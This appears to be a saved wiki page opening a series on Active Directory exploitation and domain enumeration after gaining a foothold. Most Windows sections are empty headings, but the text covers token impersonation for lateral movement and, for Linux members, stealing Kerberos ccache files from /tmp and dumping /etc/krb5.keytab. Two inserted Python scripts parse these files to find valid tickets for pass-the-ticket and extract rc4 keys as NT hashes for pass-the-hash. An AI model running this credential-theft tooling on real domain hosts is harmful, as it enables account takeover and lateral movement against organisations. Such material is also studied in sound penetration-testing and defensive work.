[Backup] Domain Enumeration Methodology

Hey folks, today I start a new series of articles on Active Directory exploitation. This first article focuses on domain enumeration. We assume you already have an initial shell on a domain-joined computer, whether it is a Windows or a Linux domain member, because we will discuss both : D

Be aware that this article does not focus on the detailed usage of tools and commands; it focuses on methodology.

Enumeration on Windows

0: One-Click Vulnerabilities

1: Domain User

2: Domain Group

3: Foreign Members

4: Domain Computer

5: Existing Sessions and Processes

After getting SYSTEM privilege on a host, we can impersonate any domain user who has a logon session on it (for example by stealing that user's token). If the impersonated user holds rights elsewhere, we can move to other machines, or even to other domains.

6: Owned Users’ Permission

7: Service Access

8: GPO

9: Delegation

10: ADCS

11: Trust

Enumeration on Linux

As A Normal User

As A Privileged User

ccache files hold the Kerberos credentials (TGT and service tickets) of a user who has authenticated to a Linux domain computer. If there is an active domain user session, we can find ccache files in /tmp, named krb5cc_<uid> (sometimes with a random suffix); each file is readable only by its owner, so enumerating all of them requires root. We can use a ccache file directly on the Linux machine by pointing KRB5CCNAME at it (export KRB5CCNAME=/tmp/krb5cc_<uid>) and running Kerberos-aware tools, or use impacket's ticketConverter.py to convert it to .kirbi format and pass the ticket into the current session on a Windows machine.
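As an added example (not code from the original article), the following Python script reads the MIT ccache v4 binary format directly to report which principal a cache belongs to and whether each cached ticket is still valid, which is what you want to know before exporting KRB5CCNAME to it. It builds a constructed sample cache so it runs offline; the principal names, realm CORP.LOCAL and reference time are assumptions, and the key and ticket bytes are dummies. Pass a real path such as /tmp/krb5cc_<uid> as the first argument to use it on a host.

```python
"""Identify the owner and tickets of an MIT Kerberos credential cache (v4).

Added example: parses the ccache binary format (version 0x0504) so it runs
offline on a constructed sample; on a host, point it at /tmp/krb5cc_<uid>.
Names, realm and reference time below are constructed, not real data.
"""
import struct
import time

KRB5_CCACHE_V4 = 0x0504


def _cstr32(data, pos):
    """Read a uint32-length-prefixed byte string; return (bytes, new pos)."""
    (n,) = struct.unpack_from(">I", data, pos)
    return data[pos + 4:pos + 4 + n], pos + 4 + n


def _principal(data, pos):
    """Parse a v4 principal: name_type, component count, realm, components."""
    _name_type, ncomp = struct.unpack_from(">II", data, pos)
    realm, pos = _cstr32(data, pos + 8)
    comps = []
    for _ in range(ncomp):
        c, pos = _cstr32(data, pos)
        comps.append(c.decode())
    return "/".join(comps) + "@" + realm.decode(), pos


def parse_ccache(data):
    """Return (default principal, [(server principal, enctype, endtime), ...])."""
    (version,) = struct.unpack_from(">H", data, 0)
    if version != KRB5_CCACHE_V4:
        raise ValueError("unsupported ccache version 0x%04x" % version)
    (hlen,) = struct.unpack_from(">H", data, 2)
    pos = 4 + hlen                              # skip header tags (DeltaTime)
    client, pos = _principal(data, pos)
    creds = []
    while pos < len(data):
        _, pos = _principal(data, pos)          # credential's client principal
        server, pos = _principal(data, pos)
        enctype, klen = struct.unpack_from(">HI", data, pos)
        pos += 6 + klen                         # keyblock: enctype, len, key
        _auth, _start, endtime, _renew = struct.unpack_from(">IIII", data, pos)
        pos += 16 + 1 + 4                       # times, is_skey, ticket_flags
        for _ in range(2):                      # addresses, then authdata
            (count,) = struct.unpack_from(">I", data, pos)
            pos += 4
            for _ in range(count):
                _type, n = struct.unpack_from(">HI", data, pos)
                pos += 6 + n
        for _ in range(2):                      # ticket, second_ticket
            _, pos = _cstr32(data, pos)
        creds.append((server, enctype, endtime))
    return client, creds


def summarize(data, now=None):
    """Lines naming the cache owner and the validity of each cached ticket."""
    now = time.time() if now is None else now
    client, creds = parse_ccache(data)
    lines = ["default principal: " + client]
    for server, enctype, endtime in creds:
        state = "valid" if endtime > now else "EXPIRED"
        lines.append("  %-40s enctype=%-3d %s" % (server, enctype, state))
    return lines


def _enc_principal(name):
    """Encode 'comp/comp@REALM' as a v4 principal (name_type 1 = NT_PRINCIPAL)."""
    name_part, realm = name.rsplit("@", 1)
    comps = name_part.split("/")
    out = struct.pack(">II", 1, len(comps))
    for s in [realm] + comps:
        b = s.encode()
        out += struct.pack(">I", len(b)) + b
    return out


def build_ccache(client, creds):
    """Build a minimal v4 ccache for the demo: header, default principal, then
    one credential per (server, enctype, endtime) with dummy key and ticket."""
    out = struct.pack(">HH", KRB5_CCACHE_V4, 12)
    out += struct.pack(">HH", 1, 8) + b"\x00" * 8            # DeltaTime tag
    out += _enc_principal(client)
    for server, enctype, endtime in creds:
        out += _enc_principal(client) + _enc_principal(server)
        out += struct.pack(">HI", enctype, 4) + b"\xaa" * 4  # dummy session key
        out += struct.pack(">IIII", endtime - 36000, endtime - 36000, endtime, endtime + 86400)
        out += b"\x00" + struct.pack(">I", 0x40E10000)       # is_skey, flags
        out += struct.pack(">II", 0, 0)                      # no addresses/authdata
        out += struct.pack(">I", 16) + b"\xbb" * 16          # dummy ticket
        out += struct.pack(">I", 0)                          # no second ticket
    return out


SAMPLE_NOW = 1709142000                                      # constructed clock
SAMPLE = build_ccache("jdoe@CORP.LOCAL", [                   # constructed cache
    ("krbtgt/CORP.LOCAL@CORP.LOCAL", 18, SAMPLE_NOW + 3600),
    ("cifs/fs01.corp.local@CORP.LOCAL", 18, SAMPLE_NOW - 60),
])

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print("\n".join(summarize(open(sys.argv[1], "rb").read())))
    else:
        print("\n".join(summarize(SAMPLE, SAMPLE_NOW)))
```

The parser deliberately walks every credential rather than stopping at the default principal: a cache whose TGT has expired is useless for pass-the-ticket, while a still-valid krbtgt entry is what makes the file worth exporting.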

A keytab file stores Kerberos principal names together with their long-term secret keys (AES, RC4-HMAC and, historically, DES), derived from the account password that the principal uses to authenticate to the Kerberos Key Distribution Center (KDC). Because the RC4-HMAC key is the NT hash, a keytab yields a hash usable for pass-the-hash as the machine account, and the AES keys can be used for overpass-the-hash. We can use a script (https://github.com/sosdave/KeyTabExtract) to retrieve these keys. Each Linux domain computer has its keytab at /etc/krb5.keytab; by default it is readable only by root.
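As an added example, not the article's code and not the KeyTabExtract script it links to, here is a Python parser for the keytab binary format (version 0x0502) that lists every principal, kvno, enctype and key, and pulls out the rc4-hmac keys as NT hashes. It runs offline on a constructed keytab; the principals (LINUX01$, host/linux01.corp.local), the realm CORP.LOCAL and the key bytes are assumptions, not real secrets. Pass /etc/krb5.keytab as the first argument to run it on a host (as root).

```python
"""Dump the long-term keys from an MIT-format keytab (version 0x0502).

Added example, not the article's code nor KeyTabExtract. Runs offline on a
constructed keytab; on a domain-joined host feed it /etc/krb5.keytab (root).
Principals, realm and key bytes below are constructed, not real secrets.
"""
import struct

KEYTAB_V2 = 0x0502
ENCTYPES = {1: "des-cbc-crc", 3: "des-cbc-md5", 17: "aes128-cts-hmac-sha1-96",
            18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}


def _cstr16(data, pos):
    """Read a uint16-length-prefixed byte string; return (bytes, new pos)."""
    (n,) = struct.unpack_from(">H", data, pos)
    return data[pos + 2:pos + 2 + n], pos + 2 + n


def parse_keytab(data):
    """Return one dict (principal, kvno, enctype, key hex) per live entry."""
    (version,) = struct.unpack_from(">H", data, 0)
    if version != KEYTAB_V2:
        raise ValueError("unsupported keytab version 0x%04x" % version)
    pos, entries = 2, []
    while pos + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, pos)   # signed entry length
        pos += 4
        if size < 0:                                    # deleted entry: a hole
            pos += -size
            continue
        end = pos + size
        (ncomp,) = struct.unpack_from(">H", data, pos)
        realm, pos = _cstr16(data, pos + 2)
        comps = []
        for _ in range(ncomp):
            c, pos = _cstr16(data, pos)
            comps.append(c.decode())
        _name_type, _timestamp, vno8 = struct.unpack_from(">IIB", data, pos)
        (enctype,) = struct.unpack_from(">H", data, pos + 9)
        key, pos = _cstr16(data, pos + 11)
        kvno = vno8
        if end - pos >= 4:                              # optional 32-bit kvno
            (kvno32,) = struct.unpack_from(">I", data, pos)
            kvno = kvno32 or vno8
        pos = end
        entries.append({"principal": "/".join(comps) + "@" + realm.decode(),
                        "kvno": kvno,
                        "enctype": ENCTYPES.get(enctype, "etype-%d" % enctype),
                        "key": key.hex()})
    return entries


def nt_hashes(entries):
    """rc4-hmac keys are the account's NT hash (MD4 of the UTF-16LE password),
    so they can be used directly for pass-the-hash as that principal."""
    return {e["principal"]: e["key"] for e in entries if e["enctype"] == "rc4-hmac"}


def build_keytab(entries):
    """Encode (principal, kvno, enctype id, key bytes) tuples as a v2 keytab."""
    out = struct.pack(">H", KEYTAB_V2)
    for principal, kvno, etype, key in entries:
        name, realm = principal.rsplit("@", 1)
        comps = name.split("/")
        body = struct.pack(">H", len(comps))
        for s in [realm] + comps:
            b = s.encode()
            body += struct.pack(">H", len(b)) + b
        body += struct.pack(">IIB", 1, 1709142000, kvno & 0xFF)  # NT_PRINCIPAL, ts, vno8
        body += struct.pack(">HH", etype, len(key)) + key
        body += struct.pack(">I", kvno)                            # 32-bit kvno
        out += struct.pack(">i", len(body)) + body
    return out


# Constructed sample: a Linux domain member's machine account and host SPN.
FAKE_NT_HASH = bytes.fromhex("00112233445566778899aabbccddeeff")
SAMPLE = build_keytab([
    ("LINUX01$@CORP.LOCAL", 3, 18, bytes(range(32))),
    ("LINUX01$@CORP.LOCAL", 3, 23, FAKE_NT_HASH),
    ("host/linux01.corp.local@CORP.LOCAL", 3, 18, bytes(range(32, 64))),
])

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    for e in parse_keytab(data):
        print("%-36s kvno=%-3d %-24s %s" % (e["principal"], e["kvno"], e["enctype"], e["key"]))
    for principal, nthash in nt_hashes(parse_keytab(data)).items():
        print("NT hash for %s: %s" % (principal, nthash))
```

Note the negative-size branch: keytabs rotated with ktutil or sssd keep deleted entries as holes, so a parser that ignores the sign of the size field will desynchronise on a real /etc/krb5.keytab. The kvno matters too: after a machine-password rotation, only the entry matching the account's current kvno will work against the KDC.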


Revision #1
Created 28 February 2024 18:22:59 by winslow
Updated 28 February 2024 19:38:59 by winslow